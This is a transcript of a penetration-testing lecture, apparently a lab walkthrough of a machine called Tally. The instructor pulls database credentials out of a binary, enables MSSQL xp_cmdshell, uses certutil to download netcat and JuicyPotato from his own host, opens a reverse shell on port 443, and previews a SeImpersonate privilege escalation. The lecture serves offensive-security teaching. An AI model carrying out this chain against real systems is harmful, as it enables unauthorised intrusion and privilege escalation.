801
01:02:36,950 --> 01:02:38,160
That's why I wanted to show this.

802
01:02:44,520 --> 01:02:47,820
I was looking through here, and again, you know, I'm just looking through here and then immediately

803
01:02:47,820 --> 01:02:52,450
I see what looks like credentials, right?

804
01:02:52,500 --> 01:02:53,100
You can see this.

805
01:02:54,810 --> 01:02:58,200
Now, you don't need to actually disassemble all the code like I just did using radare2.

806
01:02:59,310 --> 01:03:01,620
You could take an easier approach.

807
01:03:03,100 --> 01:03:05,280
I'll show you that in a second.

808
01:03:09,210 --> 01:03:13,440
And if we just run strings against tester.

809
01:03:21,020 --> 01:03:23,030
You know, we could search through it that way.

810
01:03:24,200 --> 01:03:27,710
Let's make sure that the strings are at least 10 characters long.

811
01:03:35,130 --> 01:03:39,450
There we go, right, you see it there. Another way you could have done this is if you

812
01:03:39,450 --> 01:03:41,010
did like grep,

813
01:03:44,250 --> 01:03:49,290
--color=always, case insensitive, show line numbers.

814
01:03:51,510 --> 01:03:54,300
Let's see, tack a, treat binaries like text.

815
01:03:54,390 --> 01:03:59,990
Tack E, extended regular expression. You could do, like, pass

816
01:04:02,610 --> 01:04:11,820
or cred or key, looking for any of these strings, pass, cred or key, inside of tester. Actually

817
01:04:12,600 --> 01:04:16,980
the only possibility is pass inside of tester.

818
01:04:18,870 --> 01:04:22,620
And you would immediately find it this way. So, a couple of different ways to find it.

819
01:04:22,620 --> 01:04:25,860
I just wanted to show you those ways. You could use radare2,

820
01:04:28,080 --> 01:04:35,220
we could use strings, or you could use grep with the tack a to treat binaries like text.

821
01:04:35,250 --> 01:04:35,970
Very cool, right.

822
01:04:36,810 --> 01:04:40,350
So let's go ahead and open up our file

823
01:04:47,710 --> 01:04:47,920
put

824
01:04:54,750 --> 01:04:54,840
in

825
01:04:57,690 --> 01:04:59,730
and we're going to want that

826
01:05:03,800 --> 01:05:07,170
user ID of sa and a database name.

827
01:05:07,320 --> 01:05:10,440
I'm going to delete all of that that is unrelated to the credential.

828
01:05:10,470 --> 01:05:13,800
We might need the database later, but I want to keep this simple.

829
01:05:14,610 --> 01:05:16,000
So how are we going to connect?

830
01:05:16,530 --> 01:05:18,540
Now, there's a couple of things we can do.

831
01:05:19,470 --> 01:05:22,350
We could, we could use DBeaver,

832
01:05:26,910 --> 01:05:32,610
which is a visual database, sort of management utility, kind of like SQL Server Management Studio.

833
01:05:33,600 --> 01:05:33,880
Right.

834
01:05:34,320 --> 01:05:38,940
I can open this up, let it work, and we could try to connect that way.

835
01:05:39,330 --> 01:05:41,520
We could also use this tool.

836
01:05:42,360 --> 01:05:45,030
DBeaver, universal database manager.

837
01:05:45,090 --> 01:05:45,390
Right.

838
01:05:46,350 --> 01:05:52,110
So this is the tool that we could use if we want to manage the DB, and you're going to see it's going

839
01:05:52,110 --> 01:05:54,200
to actually pop open a window that is going to say, how do you want to connect?

840
01:05:54,210 --> 01:05:55,110
Is it MySQL?

841
01:05:55,110 --> 01:05:59,010
Is it Microsoft SQL Server as opposed to just, you know, Oracle?

842
01:05:59,340 --> 01:06:03,690
You know, you basically pick your connector and then you download the driver and then it lets you in.

843
01:06:03,700 --> 01:06:03,950
Right.

844
01:06:03,960 --> 01:06:09,150
So we can click close on here after we click SQL Server.

845
01:06:09,900 --> 01:06:10,200
Right.

846
01:06:10,350 --> 01:06:11,100
We click next.

847
01:06:12,870 --> 01:06:18,060
And then we just put in our host, put in our credentials.

848
01:06:19,740 --> 01:06:23,970
SQL Server authentication is what we're using and then you can click Test connection to make sure it

849
01:06:23,970 --> 01:06:24,330
works.

850
01:06:28,410 --> 01:06:33,990
Here, it's saying, you know, we need the Microsoft SQL Server driver, so we can download that

851
01:06:36,540 --> 01:06:37,720
and the login failed.

852
01:06:37,740 --> 01:06:39,120
I probably just didn't copy the right thing.

853
01:06:39,870 --> 01:06:41,780
Let me make sure I have the right credential.

854
01:06:41,830 --> 01:06:43,170
I bet that's the entire string.

855
01:06:44,580 --> 01:06:47,910
Yeah, entire string on my clipboard.

856
01:06:48,000 --> 01:06:49,540
So I just grab this.

857
01:06:50,150 --> 01:06:51,130
Oh, the password.

858
01:06:51,710 --> 01:06:57,870
Well, now back to my Kali, and I'll show you sqsh, the SQL shell, in a moment.

859
01:06:58,800 --> 01:07:03,060
That's the other way we can get in. Quick, closing.

860
01:07:03,060 --> 01:07:07,290
That didn't let me close it for some reason.

861
01:07:07,740 --> 01:07:09,870
Let's just put the password in connection.

862
01:07:12,780 --> 01:07:19,890
And it says we're connected. You've got to click finish, and there's the tip of the day, which comes after

863
01:07:19,890 --> 01:07:20,440
this message.

864
01:07:20,460 --> 01:07:22,740
So, do we want to create a sample database?

865
01:07:22,740 --> 01:07:26,310
We don't. Tip of the day, click close on that.

866
01:07:26,670 --> 01:07:31,410
Then we can click close, I believe, on the screen back here, like this, big.

867
01:07:31,890 --> 01:07:39,210
And what we can do now is we can actually go to the SQL editor, or whatever, SQL editor, and then type

868
01:07:39,210 --> 01:07:41,280
in commands and Ctrl+Enter in order to execute them.

869
01:07:42,520 --> 01:07:42,870
If you right-

870
01:07:42,870 --> 01:07:46,080
click, execute, Ctrl+Enter.

871
01:07:46,800 --> 01:07:47,220
Right.

872
01:07:47,250 --> 01:07:50,940
So for example, I could do like sp_

873
01:07:53,280 --> 01:07:54,270
what is it, configure,

874
01:08:00,420 --> 01:08:03,900
show advanced options.

875
01:08:04,170 --> 01:08:04,770
I believe that's it.

876
01:08:04,780 --> 01:08:09,330
I'm trying to see if we have xp_cmdshell, which is a way of

877
01:08:12,630 --> 01:08:15,630
controlling, their way of executing commands on the database.

878
01:08:18,240 --> 01:08:19,230
So if I then did.

879
01:08:22,270 --> 01:08:26,410
xp_cmdshell, Ctrl+Enter.

880
01:08:29,350 --> 01:08:33,020
All right, and then if I did, I did xp_cmdshell, show.

881
01:08:38,610 --> 01:08:39,470
It's going to work.

882
01:08:41,660 --> 01:08:42,160
It is.

883
01:08:42,170 --> 01:08:45,680
So you can see we correctly configured it and we are running as the user on Tally.

884
01:08:46,580 --> 01:08:54,140
And we could even do like whoami /priv to see what our permissions are.

885
01:08:57,260 --> 01:08:57,870
I did something wrong.

886
01:08:57,910 --> 01:09:00,170
I put this in the quote.

887
01:09:03,440 --> 01:09:05,710
And of course, I'm telling you, I think it's just /priv.

888
01:09:08,690 --> 01:09:09,410
Yeah, that's it.

889
01:09:09,740 --> 01:09:14,270
So whoami /priv. So we're going to take a look at this in a moment, because this one is really

890
01:09:14,270 --> 01:09:16,100
interesting to see: SeImpersonatePrivilege.

891
01:09:17,000 --> 01:09:22,010
This is my favorite privilege escalation, actually, through JuicyPotato.

892
01:09:22,550 --> 01:09:23,960
There's a bunch of different potatoes.

893
01:09:23,960 --> 01:09:25,850
So there's JuicyPotato.

894
01:09:25,850 --> 01:09:32,810
There is RottenPotato, RoguePotato, Potato, LonelyPotato, SweetPotato and Potato.

895
01:09:33,080 --> 01:09:37,430
And all these potatoes are basically a way of tricking a privileged process.

896
01:09:38,240 --> 01:09:42,560
Basically what you're doing is you're setting up your process as a man in the middle

897
01:09:42,860 --> 01:09:54,050
of the local system to capture NTLM hashes from a privileged process so that you can generate a token

898
01:09:54,770 --> 01:10:02,030
that has SYSTEM integrity rights, and you can abuse the SeImpersonate privilege to assume those rights

899
01:10:02,030 --> 01:10:03,050
and escalate your privileges.

900
01:10:03,410 --> 01:10:04,450
I know that sounds crazy.

901
01:10:05,120 --> 01:10:09,770
Don't worry if it doesn't really make a lot of sense right now, I think it will a little bit later

902
01:10:09,770 --> 01:10:10,130
on.

903
01:10:10,700 --> 01:10:19,290
So right now I just want to show you this tool, sqsh, the SQL shell. Exit this top pane, rename

904
01:10:19,310 --> 01:10:21,110
this bottom pane sqsh.

905
01:10:22,080 --> 01:10:26,750
And let's go ahead and get this working. sqsh.

906
01:10:27,980 --> 01:10:28,700
What do we want to do?

907
01:10:28,700 --> 01:10:30,650
We want the username, which is sa.

908
01:10:31,310 --> 01:10:35,900
And I just got that from here. The password,

909
01:10:38,270 --> 01:10:46,550
I put that in, and then of course we want the database, which I believe is just tack capital D.

910
01:10:47,840 --> 01:10:49,220
No, it's tack capital S.

911
01:10:51,950 --> 01:10:52,760
Yeah, the server.

912
01:11:01,880 --> 01:11:02,860
So we need to do this again.

913
01:11:12,630 --> 01:11:20,940
And then you have to type go at the end of each command. Reconfigure, sp_configure xp_cmdshell.

914
01:11:23,210 --> 01:11:25,200
Oops, forgot to type reconfigure.

915
01:11:31,590 --> 01:11:35,180
Let's see if it works anyway.

916
01:11:38,340 --> 01:11:38,850
It does.

917
01:11:39,360 --> 01:11:42,300
OK, so there's a couple different things we could do, right?

918
01:11:42,540 --> 01:11:47,430
We could try to use PowerShell and get a reverse shell that way.

919
01:11:47,440 --> 01:11:49,020
I like to use living off the land binaries.

920
01:11:49,020 --> 01:11:53,940
We've already shown PowerShell in a previous lecture, so let's try to use certutil.

921
01:11:54,120 --> 01:11:54,400
Right.

922
01:11:54,630 --> 01:11:58,440
This is the way that we can download content onto a compromised endpoint.

923
01:11:59,730 --> 01:12:02,430
And I think it's a great thing to know.

924
01:12:03,040 --> 01:12:04,860
Go to LOLBAS.

925
01:12:05,040 --> 01:12:12,280
LOLBAS actually stands for Living Off The Land Binaries And Scripts, and we can look for certutil.

926
01:12:12,300 --> 01:12:19,560
I can show you how you can download content onto an endpoint by using a Microsoft-signed binary in a

927
01:12:19,560 --> 01:12:25,430
way that it was never intended to be used. Type certutil here, it pops up.

928
01:12:25,950 --> 01:12:28,620
It's one of my favorites. One of the functions is download.

929
01:12:33,030 --> 01:12:37,710
Scroll down, you'll see the site you can download, copy that.

930
01:12:40,920 --> 01:12:44,250
What we can do is we can say xp_cmdshell,

931
01:12:47,040 --> 01:12:52,700
certutil, take this out, and what we're going to actually end up downloading is JuicyPotato.

932
01:12:55,560 --> 01:12:56,610
I'm getting ready for that.

933
01:12:58,770 --> 01:13:00,240
We're going to host it on our local machine.

934
01:13:07,330 --> 01:13:08,260
And that should work.

935
01:13:08,290 --> 01:13:11,170
Now, let's go ahead and make sure that is our IP address.

936
01:13:14,740 --> 01:13:15,630
It's 10.10.14.18,

937
01:13:19,030 --> 01:13:21,370
and then let's go ahead and grab JuicyPotato.

938
01:13:33,830 --> 01:13:39,800
This is it. Now, looks like there's a LovelyPotato, too, didn't even know about that. Lots of potatoes,

939
01:13:40,790 --> 01:13:46,730
if you like potatoes, man, and this is going to be a fun privilege escalation vector for you.

940
01:13:47,870 --> 01:13:48,390
All right.

941
01:13:48,410 --> 01:13:49,570
I think we just need to grab this.

942
01:13:49,590 --> 01:13:52,610
I think the binary's already pre-compiled.

943
01:13:55,620 --> 01:14:04,230
Fresh potatoes. Let's go and grab this one, right click, copy link location,

944
01:14:07,170 --> 01:14:10,560
wget it, and

945
01:14:15,360 --> 01:14:16,350
file JuicyPotato.

946
01:14:24,560 --> 01:14:24,780
Right.

947
01:14:24,920 --> 01:14:33,860
That is the executable, and that's going to be downloaded. Before we do, we need to make sure we set

948
01:14:33,860 --> 01:14:34,790
up a Web server.

949
01:14:46,980 --> 01:14:50,970
Looks like this shell might have timed out, so let's go and start it up again.

950
01:15:08,300 --> 01:15:08,500
It's.

951
01:15:22,670 --> 01:15:31,760
Let's see, sp_configure, xp_cmdshell. My God, that works.

952
01:15:34,100 --> 01:15:39,140
So what we need is a better shell, and let's just delete this and get netcat on the box.

953
01:15:39,680 --> 01:15:44,740
We could use certutil to download it to the machine and then we can get a real shell that way.

954
01:15:44,780 --> 01:15:51,240
That way we'll get our foothold. Let's see, locate nc, and see that

955
01:15:55,970 --> 01:15:56,960
that's the one we want.

956
01:15:58,430 --> 01:15:59,620
cp

957
01:16:04,050 --> 01:16:06,380
to this current folder.

958
01:16:09,590 --> 01:16:10,130
All right.

959
01:16:11,300 --> 01:16:13,700
And then we can run this in

960
01:16:32,310 --> 01:16:33,630
to download netcat.

961
01:16:43,570 --> 01:16:44,890
Forgot the single quotes.

962
01:16:51,600 --> 01:16:58,890
It's like we took too long and it disabled itself, so you have to move really fast when you're

963
01:16:58,890 --> 01:16:59,790
doing this.

964
01:17:15,650 --> 01:17:17,040
Let's check for netcat.

965
01:17:19,560 --> 01:17:23,080
It's not there, so we probably need to download it into like a temp folder.

966
01:17:24,450 --> 01:17:28,620
Let's put it into Windows\Temp.

967
01:17:33,600 --> 01:17:37,880
And then let's see if we can find it that way.

968
01:17:45,720 --> 01:17:47,020
So that's what I found.

969
01:17:47,200 --> 01:17:48,360
Let's see if we can still run it.

970
01:17:51,710 --> 01:17:52,580
It definitely downloaded.

971
01:18:04,310 --> 01:18:04,940
sudo apt install

972
01:18:04,970 --> 01:18:07,110
rlwrap.

973
01:18:07,410 --> 01:18:10,250
OK, sudo apt install rlwrap. rlwrap will

974
01:18:13,390 --> 01:18:16,520
give us up/down arrow functionality once we get our Windows shell.

975
01:18:21,470 --> 01:18:29,600
rlwrap nc -nlvp, we want to listen on port 443,

976
01:18:31,640 --> 01:18:34,350
and then we go up here, we'll say 443.

977
01:18:34,370 --> 01:18:36,170
Let's make sure that that is our IP

978
01:18:40,010 --> 01:18:43,850
10, 10, 14, 18, as you can see right there.

979
01:18:45,500 --> 01:18:46,100
That's right.

980
01:18:47,120 --> 01:18:48,440
And we'll see how this works.

981
01:18:54,650 --> 01:18:56,470
Now, what we need to do is take this out.

982
01:18:57,830 --> 01:18:59,990
Not passing this to certutil, we're just running nc.

983
01:19:04,340 --> 01:19:04,970
And there we go.

984
01:19:05,510 --> 01:19:08,990
Got a shell. Who am I?

985
01:19:09,890 --> 01:19:10,520
We are Sarah.

986
01:19:11,630 --> 01:19:15,890
So let's go to C Drive.

987
01:19:18,890 --> 01:19:27,950
You can see the accounting directory we saw in the share earlier, we can see the FTP directory, which

988
01:19:27,950 --> 01:19:29,390
we already saw earlier.

989
01:19:30,650 --> 01:19:32,600
We can see the web server directory.

990
01:19:35,210 --> 01:19:37,670
All right, inetpub.

991
01:19:41,540 --> 01:19:42,770
And there's a bunch of stuff in here.

992
01:19:43,790 --> 01:19:45,200
What we're interested in right now

993
01:19:47,720 --> 01:19:50,180
is elevating our privileges, obviously.

994
01:19:52,190 --> 01:19:55,730
But in order to do that, we need to get that JuicyPotato to work.

995
01:19:55,730 --> 01:20:01,820
Because if we do whoami /priv, we see we have the SeImpersonate token.

996
01:20:02,690 --> 01:20:03,030
Right.

997
01:20:03,620 --> 01:20:08,720
So if we go back to the FTP,

998
01:20:13,370 --> 01:20:14,390
JuicyPotato, right.

999
01:20:14,660 --> 01:20:19,580
And if we run this, JuicyPotato,

1000
01:20:19,970 --> 01:20:21,260
it should give us the usage commands.

1001
01:20:21,280 --> 01:20:21,590
Right.

1002
01:20:21,980 --> 01:20:26,750
So in the next lecture, we're actually going to talk about using this tool to elevate our privileges from

1003
01:20:26,750 --> 01:20:31,760
a standard user. If we do net user Sarah,

1004
01:20:33,920 --> 01:20:39,620
you can see she just has Users local group membership, and that's really it.

1005
01:20:39,770 --> 01:20:46,220
There's no administrator rights. Running net user, we can see there is an Administrator user. Net localgroup

1006
01:20:47,540 --> 01:20:48,950
administrators,

1007
01:20:52,070 --> 01:20:53,420
let's see who is in that.

1008
01:20:53,450 --> 01:20:59,690
Let me see, the Administrators group only has one account in there, Administrator, and we are

1009
01:21:00,710 --> 01:21:05,860
Sarah, a user, which is a member of the Users group.

1010
01:21:06,320 --> 01:21:09,200
In the next lecture we will elevate using JuicyPotato.

1011
01:21:09,470 --> 01:21:10,760
I will see you then.
